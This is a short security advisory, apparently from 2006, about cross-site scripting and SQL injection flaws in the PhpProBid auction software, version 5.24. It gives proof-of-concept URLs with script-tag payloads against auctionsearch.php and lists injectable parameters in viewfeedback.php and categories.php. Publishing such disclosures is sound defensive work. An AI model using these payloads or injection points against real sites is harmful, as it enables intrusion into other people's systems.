Phpprobid <= 5.24 XSS SQL injection Vulnerability

2006.08.01
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89

Phpprobid 5.24 http://www.phpprobid.com -------------------------- Cross Site Scripting (XSS) -------------------------- http://target.xx/auctionsearch.php?advsrc="<script>alert(/EllipsisSecurityTest/)</script> http://target.xx/auctionsearch.php?start=1&advsrc="><script>alert(/EllipsisSecurityTest/)</script> ------------- SQL injection ------------- http://target.xx/viewfeedback.php?view=1'[SQL] http://target.xx/viewfeedback.php?view=all&start=1'[SQL] http://target.xx/categories.php?parent=&start=&orderField=itemname&orderType=1'[SQL] ----------------- Ellipsis Security http://www.ellsec.org


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top